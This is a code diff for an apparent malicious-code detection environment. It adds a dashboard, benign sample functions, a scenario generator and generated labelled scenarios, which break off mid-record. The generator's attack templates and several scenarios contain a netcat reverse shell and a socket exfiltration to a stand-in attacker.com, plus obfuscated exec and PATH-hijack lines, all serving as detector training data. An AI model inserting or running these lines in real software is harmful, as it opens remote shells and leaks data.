+                st.markdown("<div class='info-box status-malicious'>Action: BLOCKED. Vulnerability detected and no patch available.</div>", unsafe_allow_html=True)
+            elif action == env.ACTION_SUBMIT_PATCH:
+                st.markdown("<div class='info-box status-patched'>Action: PATCH SUBMITTED. Vulnerability neutralized.</div>", unsafe_allow_html=True)
+                st.json(info)
+            else:
+                st.markdown("<div class='info-box status-benign'>Action: REVIEW / ANALYZE. Code appears nominally safe or requires human review.</div>", unsafe_allow_html=True)
+        with tab2:
+            st.markdown("**(Telemetry simulates background execution for static code)**")
+            if "telemetry" in info:
+                st.json(info["telemetry"])
+            else:
+                st.info("No sandbox execution triggered for this path.")
+        with tab3:
+            if action == env.ACTION_SUBMIT_PATCH and scenario.get("patch"):
+                st.code(scenario["patch"], language='python')
+                if info.get("validation_success"):
+                    st.success("Patch passed 3-stage validation pipeline!")
+            else:
+                st.info("No patch generated.")
+if __name__ == "__main__":
+    main()
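
Note on the dummy policy in `main()`: the action choice is interleaved with Streamlit calls, which makes it hard to test. The sketch below pulls the same thresholds (0.4 and 0.6) into a pure function that returns the sequence of actions to step through. The integer values of the action constants are an assumption based on the order of `action_names` in the dashboard; `demo_policy` is a hypothetical name.

```python
# Assumed to match SentinelEnv's Discrete(5) ordering.
(ACTION_ANALYZE, ACTION_EXECUTE_SANDBOX, ACTION_BLOCK_PR,
 ACTION_SUBMIT_PATCH, ACTION_REQUEST_REVIEW) = range(5)


def demo_policy(risk, has_patch):
    """Return the list of actions the dashboard's placeholder policy takes."""
    if risk > 0.4 and has_patch:
        return [ACTION_SUBMIT_PATCH]
    # Otherwise analyze first, then either block or escalate to a human.
    follow_up = ACTION_BLOCK_PR if risk > 0.6 else ACTION_REQUEST_REVIEW
    return [ACTION_ANALYZE, follow_up]
```

The dashboard loop would then reduce to `for action in demo_policy(risk, bool(scenario.get("patch"))): obs, reward, done, _, info = env.step(action)`.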

sentinel_synth/data/__init__.py ADDED Viewed

File without changes

sentinel_synth/data/benign/ds_binarysearch.py ADDED Viewed

	@@ -0,0 +1,13 @@

+def binary_search(arr, target):
+    """Perform binary search."""
+    low = 0
+    high = len(arr) - 1
+    while low <= high:
+        mid = (low + high) // 2
+        if arr[mid] == target:
+            return mid
+        elif arr[mid] < target:
+            low = mid + 1
+        else:
+            high = mid - 1
+    return -1
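
Note on the benign corpus: files like this one are the inputs to the Track B mutation engine described in `docs/implementation`. The sketch below shows how a deterministic mutation could turn a benign file into a scenario record that follows the documented JSON schema. It is not the code in `generate_scenarios.py`: `mutate` and `ATTACK_TEMPLATES` are hypothetical, and the only template included is the inert typosquatting import quoted in the plan.

```python
import ast

# Single illustrative template; the plan lists eight attack types.
ATTACK_TEMPLATES = {
    "typosquatting": "import pythonn  # injected typosquatted import",
}


def mutate(benign_source, attack_type, scenario_id):
    """Prepend an attack template and wrap the result as a scenario dict."""
    payload = ATTACK_TEMPLATES[attack_type]
    mutated = payload + "\n" + benign_source
    ast.parse(mutated)  # raises SyntaxError if the mutation broke the file
    return {
        "id": scenario_id,
        "type": "true_positive",
        "code_snippet": mutated,
        "patch": benign_source,      # the original file is the known-good fix
        "unit_test_code": None,
        "label": "malicious",
        "source": "mutation_engine",
        "attack_type": attack_type,
    }
```

Because no randomness is involved, the same benign file and template always yield the same scenario, which keeps generated datasets reproducible.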

sentinel_synth/data/benign/ds_linkedlist.py ADDED Viewed

	@@ -0,0 +1,19 @@

+class Node:
+    def __init__(self, data):
+        self.data = data
+        self.next = None
+class LinkedList:
+    """A simple linked list."""
+    def __init__(self):
+        self.head = None
+    def append(self, data):
+        new_node = Node(data)
+        if not self.head:
+            self.head = new_node
+            return
+        last = self.head
+        while last.next:
+            last = last.next
+        last.next = new_node

sentinel_synth/data/benign/ds_queue.py ADDED Viewed

	@@ -0,0 +1,15 @@

+class Queue:
+    """A simple queue implementation."""
+    def __init__(self):
+        self.items = []
+    def enqueue(self, item):
+        self.items.insert(0, item)
+    def dequeue(self):
+        if not self.is_empty():
+            return self.items.pop()
+        return None
+    def is_empty(self):
+        return len(self.items) == 0

sentinel_synth/data/benign/ds_sorting.py ADDED Viewed

	@@ -0,0 +1,8 @@

+def bubble_sort(arr):
+    """Sort an array using bubble sort."""
+    n = len(arr)
+    for i in range(n):
+        for j in range(0, n-i-1):
+            if arr[j] > arr[j+1]:
+                arr[j], arr[j+1] = arr[j+1], arr[j]
+    return arr

sentinel_synth/data/benign/ds_stack.py ADDED Viewed

	@@ -0,0 +1,15 @@

+class Stack:
+    """A simple stack implementation."""
+    def __init__(self):
+        self.items = []
+    def push(self, item):
+        self.items.append(item)
+    def pop(self):
+        if not self.is_empty():
+            return self.items.pop()
+        return None
+    def is_empty(self):
+        return len(self.items) == 0

sentinel_synth/data/benign/io_config.py ADDED Viewed

	@@ -0,0 +1,15 @@

+def read_ini_config(content):
+    """Read a simple INI configuration."""
+    config = {}
+    current_section = None
+    for line in content.split('\n'):
+        line = line.strip()
+        if not line or line.startswith('#'):
+            continue
+        if line.startswith('[') and line.endswith(']'):
+            current_section = line[1:-1]
+            config[current_section] = {}
+        elif '=' in line and current_section:
+            key, val = line.split('=', 1)
+            config[current_section][key.strip()] = val.strip()
+    return config

sentinel_synth/data/benign/io_csv.py ADDED Viewed

	@@ -0,0 +1,11 @@

+def parse_csv(csv_content):
+    """Parse simple CSV content."""
+    lines = csv_content.strip().split('\n')
+    if not lines:
+        return []
+    headers = lines[0].split(',')
+    result = []
+    for line in lines[1:]:
+        values = line.split(',')
+        result.append(dict(zip(headers, values)))
+    return result

sentinel_synth/data/benign/io_json.py ADDED Viewed

	@@ -0,0 +1,5 @@

+import json
+def format_json(obj):
+    """Format dictionary as readable JSON string."""
+    return json.dumps(obj, indent=4, sort_keys=True)

sentinel_synth/data/benign/io_log.py ADDED Viewed

	@@ -0,0 +1,8 @@

+def parse_logs(log_lines):
+    """Parse simple log lines into level and message."""
+    parsed = []
+    for line in log_lines:
+        parts = line.split(' - ', 1)
+        if len(parts) == 2:
+            parsed.append({"level": parts[0].strip('[]'), "message": parts[1]})
+    return parsed

sentinel_synth/data/benign/io_template.py ADDED Viewed

	@@ -0,0 +1,6 @@

+def render_template(template, context):
+    """Simple template rendering replacing {{key}}."""
+    result = template
+    for key, value in context.items():
+        result = result.replace(f"{{{{{key}}}}}", str(value))
+    return result

sentinel_synth/data/benign/math_factorial.py ADDED

	@@ -0,0 +1,5 @@

+def factorial(n):
+    """Calculate the factorial of a number."""
+    if n == 0:
+        return 1
+    return n * factorial(n - 1)

sentinel_synth/data/benign/math_fibonacci.py ADDED

	@@ -0,0 +1,7 @@

+def fibonacci(n):
+    """Return the nth Fibonacci number."""
+    if n <= 0:
+        return 0
+    elif n == 1:
+        return 1
+    return fibonacci(n - 1) + fibonacci(n - 2)
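
Review note: the doubly recursive `fibonacci` above takes exponential time in `n`, which could matter if the generated unit tests are ever run in the sandbox with larger inputs. A linear-time sketch with the same return values for the same inputs follows. The name `fibonacci_iter` is hypothetical.

```python
def fibonacci_iter(n):
    """Return the nth Fibonacci number in O(n) time (0 for n <= 0)."""
    if n <= 0:
        return 0
    prev, curr = 0, 1
    # After k iterations, curr holds F(k + 1).
    for _ in range(n - 1):
        prev, curr = curr, prev + curr
    return curr


values = [fibonacci_iter(i) for i in range(8)]
print(values)
```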

sentinel_synth/data/benign/math_gcd.py ADDED

	@@ -0,0 +1,5 @@

+def gcd(a, b):
+    """Calculate the Greatest Common Divisor."""
+    while b:
+        a, b = b, a % b
+    return a

sentinel_synth/data/benign/math_matrix.py ADDED

	@@ -0,0 +1,3 @@

+def matrix_addition(mat1, mat2):
+    """Add two matrices."""
+    return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]

sentinel_synth/data/benign/math_prime.py ADDED

	@@ -0,0 +1,8 @@

+def is_prime(n):
+    """Check if a number is prime."""
+    if n <= 1:
+        return False
+    for i in range(2, int(n ** 0.5) + 1):
+        if n % i == 0:
+            return False
+    return True

sentinel_synth/data/benign/misc_calc.py ADDED

	@@ -0,0 +1,13 @@

+def basic_calculator(a, b, op):
+    """Perform a basic math operation."""
+    if op == '+':
+        return a + b
+    elif op == '-':
+        return a - b
+    elif op == '*':
+        return a * b
+    elif op == '/':
+        if b == 0:
+            raise ValueError("Division by zero")
+        return a / b
+    return None

sentinel_synth/data/benign/misc_date.py ADDED

	@@ -0,0 +1,3 @@

+def format_iso_date(year, month, day):
+    """Format date components into an ISO 8601 string."""
+    return f"{year:04d}-{month:02d}-{day:02d}"

sentinel_synth/data/benign/misc_password.py ADDED

	@@ -0,0 +1,8 @@

+def is_strong_password(pwd):
+    """Check if password meets basic strength criteria."""
+    if len(pwd) < 8:
+        return False
+    has_upper = any(c.isupper() for c in pwd)
+    has_lower = any(c.islower() for c in pwd)
+    has_digit = any(c.isdigit() for c in pwd)
+    return has_upper and has_lower and has_digit

sentinel_synth/data/benign/misc_temp.py ADDED

	@@ -0,0 +1,7 @@

+def celsius_to_fahrenheit(c):
+    """Convert Celsius to Fahrenheit."""
+    return (c * 9/5) + 32
+def fahrenheit_to_celsius(f):
+    """Convert Fahrenheit to Celsius."""
+    return (f - 32) * 5/9

sentinel_synth/data/benign/misc_url.py ADDED

	@@ -0,0 +1,11 @@

+def parse_url_params(url):
+    """Parse query parameters from a URL."""
+    if '?' not in url:
+        return {}
+    query = url.split('?', 1)[1]
+    params = {}
+    for pair in query.split('&'):
+        if '=' in pair:
+            k, v = pair.split('=', 1)
+            params[k] = v
+    return params
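
Review note: `parse_url_params` returns raw, still percent-encoded values and would fold a `#fragment` into the last value. As a hedged comparison, the sketch below uses `urllib.parse` from the standard library, which decodes values and strips the fragment. The name `parse_url_params_decoded` is hypothetical. As in the original, a repeated key keeps its last value.

```python
from urllib.parse import parse_qsl, urlsplit


def parse_url_params_decoded(url):
    """Return query parameters as a dict with percent-decoding applied."""
    query = urlsplit(url).query
    # parse_qsl yields (key, value) pairs; dict() keeps the last duplicate.
    return dict(parse_qsl(query))


params = parse_url_params_decoded("https://example.com/p?q=a%20b&x=1#top")
print(params)
```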

sentinel_synth/data/benign/str_anagram.py ADDED

	@@ -0,0 +1,3 @@

+def is_anagram(s1, s2):
+    """Check if two strings are anagrams."""
+    return sorted(s1.replace(" ", "").lower()) == sorted(s2.replace(" ", "").lower())

sentinel_synth/data/benign/str_caesar.py ADDED

	@@ -0,0 +1,10 @@

+def caesar_cipher(text, shift):
+    """Apply Caesar cipher to text."""
+    result = ""
+    for char in text:
+        if char.isalpha():
+            start = ord('a') if char.islower() else ord('A')
+            result += chr((ord(char) - start + shift) % 26 + start)
+        else:
+            result += char
+    return result

sentinel_synth/data/benign/str_palindrome.py ADDED

	@@ -0,0 +1,4 @@

+def is_palindrome(s):
+    """Check if a string is a palindrome."""
+    cleaned = ''.join(c.lower() for c in s if c.isalnum())
+    return cleaned == cleaned[::-1]

sentinel_synth/data/benign/str_slug.py ADDED

	@@ -0,0 +1,6 @@

+def generate_slug(title):
+    """Generate a URL-friendly slug."""
+    import re
+    title = title.lower()
+    title = re.sub(r'[^a-z0-9\s-]', '', title)
+    return re.sub(r'[\s-]+', '-', title).strip('-')

sentinel_synth/data/benign/str_wordcount.py ADDED

	@@ -0,0 +1,7 @@

+def word_count(text):
+    """Count occurrences of words in text."""
+    words = text.split()
+    counts = {}
+    for word in words:
+        counts[word] = counts.get(word, 0) + 1
+    return counts

sentinel_synth/data/generate_scenarios.py ADDED

	@@ -0,0 +1,253 @@

+import os
+import json
+import random
+import subprocess
+import tempfile
+import uuid
+from pathlib import Path
+# ============================================================
+# Attack Templates for Mutation Engine (Track B)
+# ============================================================
+ATTACK_TEMPLATES = {
+    "typosquatting": {
+        "inject": "import pythonn\n\n",
+        "patch": "",
+    },
+    "obfuscated_exec": {
+        "inject": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\n",
+        "patch": "",
+    },
+    "env_hijack": {
+        "inject": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\n",
+        "patch": "",
+    },
+    "subprocess_backdoor": {
+        "inject": "import subprocess\ntry:\n    subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\nexcept:\n    pass\n\n",
+        "patch": "",
+    },
+    "eval_hidden": {
+        "inject": "def safe_eval(x):\n    return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\n",
+        "patch": "",
+    },
+    "pickle_deserialization": {
+        "inject": "import pickle\npickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\n",
+        "patch": "",
+    },
+    "socket_exfil": {
+        "inject": "import socket\ntry:\n    s = socket.socket()\n    s.connect(('attacker.com', 80))\n    s.sendall(b'exfiltrated data')\nexcept:\n    pass\n\n",
+        "patch": "",
+    },
+    "malicious_import": {
+        "inject": "__import__('os').system('echo pwned > /tmp/pwned')\n\n",
+        "patch": ""
+    }
+}
+def load_benign_files(benign_dir):
+    files_data = []
+    if not os.path.exists(benign_dir):
+        return files_data
+    for filename in os.listdir(benign_dir):
+        if filename.endswith(".py"):
+            with open(os.path.join(benign_dir, filename), "r") as f:
+                content = f.read()
+                files_data.append({"filename": filename, "code": content})
+    return files_data
+def auto_generate_unit_test(filename, code):
+    """Generates a simple unit test that passes when run against the patched code."""
+    test_code = "import code\n"
+    if "fibonacci" in code:
+        test_code += "assert code.fibonacci(5) == 5\n"
+    elif "factorial" in code:
+        test_code += "assert code.factorial(5) == 120\n"
+    elif "is_prime" in code:
+        test_code += "assert code.is_prime(7) == True\n"
+    elif "gcd" in code:
+        test_code += "assert code.gcd(48, 18) == 6\n"
+    elif "is_palindrome" in code:
+        test_code += "assert code.is_palindrome('racecar') == True\n"
+    elif "celsius_to_fahrenheit" in code:
+        test_code += "assert code.celsius_to_fahrenheit(0) == 32\n"
+    else:
+        # Minimal test: just ensure the module loads without error
+        test_code += "assert True  # module loaded successfully\n"
+    return test_code
+def generate_track_b_scenarios(benign_files, num_examples=40):
+    """Track B: Custom mutation engine (always used). Counts are fixed at 20/10/10; num_examples is currently unused."""
+    scenarios = []
+    # True Positives (20)
+    for i in range(20):
+        bf = random.choice(benign_files)
+        attack_name, attack_data = random.choice(list(ATTACK_TEMPLATES.items()))
+        malicious_code = attack_data["inject"] + bf["code"]
+        test_code = auto_generate_unit_test(bf["filename"], bf["code"])
+        scenarios.append({
+            "id": f"tp_{uuid.uuid4().hex[:8]}",
+            "type": "true_positive",
+            "code_snippet": malicious_code,
+            "patch": bf["code"],
+            "unit_test_code": test_code,
+            "label": "malicious",
+            "source": "mutation_engine",
+            "attack_type": attack_name
+        })
+    # False Positives (10)
+    fp_templates = [
+        ("fp_eval", "def safe_calc(expr):\n    # Legit eval in controlled env\n    return eval(expr, {'__builtins__': {}}, {})\n\n"),
+        ("fp_requests", "import requests\n# Just checking internet\ntry:\n    requests.get('https://8.8.8.8', timeout=1)\nexcept:\n    pass\n\n"),
+        ("fp_os_environ", "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\n"),
+        ("fp_base64", "import base64\ndef encode_msg(msg):\n    return base64.b64encode(msg.encode())\n\n")
+    ]
+    for i in range(10):
+        bf = random.choice(benign_files)
+        fp_name, fp_code = random.choice(fp_templates)
+        suspicious_code = fp_code + bf["code"]
+        test_code = auto_generate_unit_test(bf["filename"], bf["code"])
+        scenarios.append({
+            "id": f"fp_{uuid.uuid4().hex[:8]}",
+            "type": "false_positive",
+            "code_snippet": suspicious_code,
+            "patch": None,
+            "unit_test_code": test_code,
+            "label": "benign",
+            "source": "mutation_engine",
+            "attack_type": None
+        })
+    # Functional (10)
+    for i in range(10):
+        bf = random.choice(benign_files)
+        test_code = auto_generate_unit_test(bf["filename"], bf["code"])
+        scenarios.append({
+            "id": f"fn_{uuid.uuid4().hex[:8]}",
+            "type": "functional",
+            "code_snippet": bf["code"],
+            "patch": None,
+            "unit_test_code": test_code,
+            "label": "benign",
+            "source": "mutation_engine",
+            "attack_type": None
+        })
+    return scenarios
+def generate_track_a_scenarios_with_sdk(output_dir: str, num_samples: int = 10):
+    """
+    Track A: Use Meta's synthetic-data-kit to generate high-quality code examples.
+    Follows the 4-stage pipeline: ingest -> create -> curate -> save-as
+    """
+    sdk_scenarios = []
+    # Check if synthetic-data-kit CLI is available
+    try:
+        subprocess.run(["synthetic-data-kit", "--help"], capture_output=True, check=True)
+    except (subprocess.SubprocessError, FileNotFoundError):
+        print("⚠️ Meta synthetic-data-kit CLI not found. Track A disabled.")
+        return sdk_scenarios
+    # Path to our SDK config
+    config_path = Path(__file__).parent / "sdk_config.yaml"
+    if not config_path.exists():
+        print(f"⚠️ SDK config not found at {config_path}. Track A disabled.")
+        return sdk_scenarios
+    # Create a temporary directory for the SDK workspace
+    with tempfile.TemporaryDirectory() as tmpdir:
+        tmp_path = Path(tmpdir)
+        workspace_dir = tmp_path / "sdk_workspace"
+        workspace_dir.mkdir()
+        # 1. Ingest (We'll ingest the benign files as seeds)
+        try:
+            benign_dir = Path(__file__).parent / "benign"
+            if benign_dir.exists():
+                subprocess.run(
+                    ["synthetic-data-kit", "ingest", str(benign_dir), "--output", str(workspace_dir / "ingested")],
+                    check=True, capture_output=True
+                )
+            # 2. Create (Generate synthetic examples)
+            subprocess.run(
+                ["synthetic-data-kit", "create", str(workspace_dir / "ingested"),
+                 "--type", "qa", "-c", str(config_path), "--output", str(workspace_dir / "created")],
+                check=True, capture_output=True, timeout=600
+            )
+            # 3. Curate (Filter low-quality examples)
+            subprocess.run(
+                ["synthetic-data-kit", "curate", str(workspace_dir / "created"),
+                 "--output", str(workspace_dir / "curated")],
+                check=True, capture_output=True
+            )
+            # 4. Save-As (Export to JSON)
+            output_json = workspace_dir / "final_sdk.json"
+            subprocess.run(
+                ["synthetic-data-kit", "save-as", str(workspace_dir / "curated"),
+                 "--format", "json", "--output", str(output_json)],
+                check=True, capture_output=True
+            )
+            # Load generated data and convert to our format
+            if output_json.exists():
+                with open(output_json, "r") as f:
+                    data = json.load(f)
+                for item in data:
+                    # Expecting keys based on sdk_config.yaml prompts
+                    sdk_scenarios.append({
+                        "id": f"{'tp' if item.get('patch') else 'fn'}_sdk_{uuid.uuid4().hex[:8]}",
+                        "type": "true_positive" if item.get("patch") else "functional",
+                        "code_snippet": item.get("code_snippet") or item.get("code"),
+                        "patch": item.get("patch"),
+                        "unit_test_code": item.get("unit_test_code", "import code\nassert True"),
+                        "label": "malicious" if item.get("patch") else "benign",
+                        "source": "synthetic_data_kit",
+                        "attack_type": item.get("attack_type", "llm_generated")
+                    })
+        except subprocess.TimeoutExpired:
+            print("⚠️ SDK generation timed out.")
+        except subprocess.CalledProcessError as e:
+            print(f"⚠️ SDK command failed: {e.stderr.decode() if e.stderr else 'Unknown error'}")
+    return sdk_scenarios
+def main():
+    import argparse
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--benign-dir", type=str, default="sentinel_synth/data/benign/")
+    parser.add_argument("--output", type=str, default="sentinel_synth/data/scenarios.json")
+    parser.add_argument("--use-sdk", action="store_true", help="Use Meta synthetic-data-kit (requires the `synthetic-data-kit` CLI)")
+    parser.add_argument("--sdk-samples", type=int, default=10, help="Number of SDK samples to generate")
+    args = parser.parse_args()
+    benign_files = load_benign_files(args.benign_dir)
+    if not benign_files:
+        print(f"No benign files found in {args.benign_dir}. Create some first.")
+        return
+    # Start with Track B scenarios (mutation engine)
+    scenarios = generate_track_b_scenarios(benign_files, 40)
+    # Add Track A (Meta SDK) if requested
+    if args.use_sdk:
+        # Note: the SDK workspace is a temporary directory created inside the function,
+        # so the output_dir argument is currently unused; `args.output` is where the final aggregated data is saved
+        sdk_scenarios = generate_track_a_scenarios_with_sdk(os.path.dirname(args.output), args.sdk_samples)
+        scenarios.extend(sdk_scenarios)
+        if sdk_scenarios:
+            print(f"Added {len(sdk_scenarios)} SDK-generated scenarios.")
+    # Shuffle and save
+    random.shuffle(scenarios)
+    os.makedirs(os.path.dirname(args.output) or ".", exist_ok=True)
+    with open(args.output, "w") as f:
+        json.dump(scenarios, f, indent=4)
+    print(f"Total scenarios: {len(scenarios)}")
+    print(f"  Malicious: {len([s for s in scenarios if s['label'] == 'malicious'])}")
+    print(f"  Benign:    {len([s for s in scenarios if s['label'] == 'benign'])}")
+    print(f"Saved to {args.output}")
+if __name__ == "__main__":
+    main()
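
Review note: the `obfuscated_exec` template in `ATTACK_TEMPLATES` calls `base64.b64decode` without importing `base64`, so a snippet built from it would likely stop with a `NameError` before the hidden payload runs. The sketch below decodes the payload string copied from the diff and checks that behaviour in an empty namespace. The helper names `decode_payload` and `raises_name_error` are hypothetical and not part of this commit.

```python
import base64

# Payload string copied verbatim from the "obfuscated_exec" template.
PAYLOAD_B64 = "cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik="
INJECT = f"exec(base64.b64decode('{PAYLOAD_B64}'))\n\n"


def decode_payload(b64_text):
    """Return the source text hidden inside the base64 string."""
    return base64.b64decode(b64_text).decode("utf-8")


def raises_name_error(source):
    """Run source in a fresh namespace and report whether it hits NameError."""
    try:
        exec(source, {})
    except NameError:
        return True
    return False


decoded = decode_payload(PAYLOAD_B64)
missing_import = raises_name_error(INJECT)
print(decoded)
print(missing_import)
```

If the intent is for the injected line to execute, prepending `import base64\n` to the template's `inject` string would be one option. If the intent is only static detection, the template works as written.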

sentinel_synth/data/scenarios.json ADDED

	@@ -0,0 +1,402 @@

+[
+    {
+        "id": "fp_4cc36ade",
+        "type": "false_positive",
+        "code_snippet": "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\ndef matrix_addition(mat1, mat2):\n    \"\"\"Add two matrices.\"\"\"\n    return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fp_dd7e5a4d",
+        "type": "false_positive",
+        "code_snippet": "def safe_calc(expr):\n    # Legit eval in controlled env\n    return eval(expr, {'__builtins__': {}}, {})\n\ndef caesar_cipher(text, shift):\n    \"\"\"Apply Caesar cipher to text.\"\"\"\n    result = \"\"\n    for char in text:\n        if char.isalpha():\n            start = ord('a') if char.islower() else ord('A')\n            result += chr((ord(char) - start + shift) % 26 + start)\n        else:\n            result += char\n    return result",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_7ffae123",
+        "type": "true_positive",
+        "code_snippet": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\ndef bubble_sort(arr):\n    \"\"\"Sort an array using bubble sort.\"\"\"\n    n = len(arr)\n    for i in range(n):\n        for j in range(0, n-i-1):\n            if arr[j] > arr[j+1]:\n                arr[j], arr[j+1] = arr[j+1], arr[j]\n    return arr",
+        "patch": "def bubble_sort(arr):\n    \"\"\"Sort an array using bubble sort.\"\"\"\n    n = len(arr)\n    for i in range(n):\n        for j in range(0, n-i-1):\n            if arr[j] > arr[j+1]:\n                arr[j], arr[j+1] = arr[j+1], arr[j]\n    return arr",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "obfuscated_exec"
+    },
+    {
+        "id": "fp_6ab25c4e",
+        "type": "false_positive",
+        "code_snippet": "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\ndef factorial(n):\n    \"\"\"Calculate the factorial of a number.\"\"\"\n    if n == 0:\n        return 1\n    return n * factorial(n - 1)",
+        "patch": null,
+        "unit_test_code": "import code\nassert code.factorial(5) == 120\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_c9e41cb4",
+        "type": "true_positive",
+        "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef matrix_addition(mat1, mat2):\n    \"\"\"Add two matrices.\"\"\"\n    return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
+        "patch": "def matrix_addition(mat1, mat2):\n    \"\"\"Add two matrices.\"\"\"\n    return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "env_hijack"
+    },
+    {
+        "id": "tp_5593ef6c",
+        "type": "true_positive",
+        "code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef render_template(template, context):\n    \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n    result = template\n    for key, value in context.items():\n        result = result.replace(f\"{{{{{key}}}}}\", str(value))\n    return result",
+        "patch": "def render_template(template, context):\n    \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n    result = template\n    for key, value in context.items():\n        result = result.replace(f\"{{{{{key}}}}}\", str(value))\n    return result",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "malicious_import"
+    },
+    {
+        "id": "fn_69406790",
+        "type": "functional",
+        "code_snippet": "def caesar_cipher(text, shift):\n    \"\"\"Apply Caesar cipher to text.\"\"\"\n    result = \"\"\n    for char in text:\n        if char.isalpha():\n            start = ord('a') if char.islower() else ord('A')\n            result += chr((ord(char) - start + shift) % 26 + start)\n        else:\n            result += char\n    return result",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_76aa219b",
+        "type": "true_positive",
+        "code_snippet": "import socket\ntry:\n    s = socket.socket()\n    s.connect(('attacker.com', 80))\n    s.sendall(b'exfiltrated data')\nexcept:\n    pass\n\ndef word_count(text):\n    \"\"\"Count occurrences of words in text.\"\"\"\n    words = text.split()\n    counts = {}\n    for word in words:\n        counts[word] = counts.get(word, 0) + 1\n    return counts",
+        "patch": "def word_count(text):\n    \"\"\"Count occurrences of words in text.\"\"\"\n    words = text.split()\n    counts = {}\n    for word in words:\n        counts[word] = counts.get(word, 0) + 1\n    return counts",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "socket_exfil"
+    },
+    {
+        "id": "fp_661ae03e",
+        "type": "false_positive",
+        "code_snippet": "import requests\n# Just checking internet\ntry:\n    requests.get('https://8.8.8.8', timeout=1)\nexcept:\n    pass\n\nclass Queue:\n    \"\"\"A simple queue implementation.\"\"\"\n    def __init__(self):\n        self.items = []\n        \n    def enqueue(self, item):\n        self.items.insert(0, item)\n        \n    def dequeue(self):\n        if not self.is_empty():\n            return self.items.pop()\n        return None\n        \n    def is_empty(self):\n        return len(self.items) == 0",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fn_afb2fb13",
+        "type": "functional",
+        "code_snippet": "def read_ini_config(content):\n    \"\"\"Read a simple INI configuration.\"\"\"\n    config = {}\n    current_section = None\n    for line in content.split('\\n'):\n        line = line.strip()\n        if not line or line.startswith('#'):\n            continue\n        if line.startswith('[') and line.endswith(']'):\n            current_section = line[1:-1]\n            config[current_section] = {}\n        elif '=' in line and current_section:\n            key, val = line.split('=', 1)\n            config[current_section][key.strip()] = val.strip()\n    return config",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fn_7d9c3863",
+        "type": "functional",
+        "code_snippet": "def binary_search(arr, target):\n    \"\"\"Perform binary search.\"\"\"\n    low = 0\n    high = len(arr) - 1\n    while low <= high:\n        mid = (low + high) // 2\n        if arr[mid] == target:\n            return mid\n        elif arr[mid] < target:\n            low = mid + 1\n        else:\n            high = mid - 1\n    return -1",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fn_81a53eff",
+        "type": "functional",
+        "code_snippet": "def render_template(template, context):\n    \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n    result = template\n    for key, value in context.items():\n        result = result.replace(f\"{{{{{key}}}}}\", str(value))\n    return result",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_dd51805d",
+        "type": "true_positive",
+        "code_snippet": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\ndef word_count(text):\n    \"\"\"Count occurrences of words in text.\"\"\"\n    words = text.split()\n    counts = {}\n    for word in words:\n        counts[word] = counts.get(word, 0) + 1\n    return counts",
+        "patch": "def word_count(text):\n    \"\"\"Count occurrences of words in text.\"\"\"\n    words = text.split()\n    counts = {}\n    for word in words:\n        counts[word] = counts.get(word, 0) + 1\n    return counts",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "obfuscated_exec"
+    },
+    {
+        "id": "tp_82f7c7df",
+        "type": "true_positive",
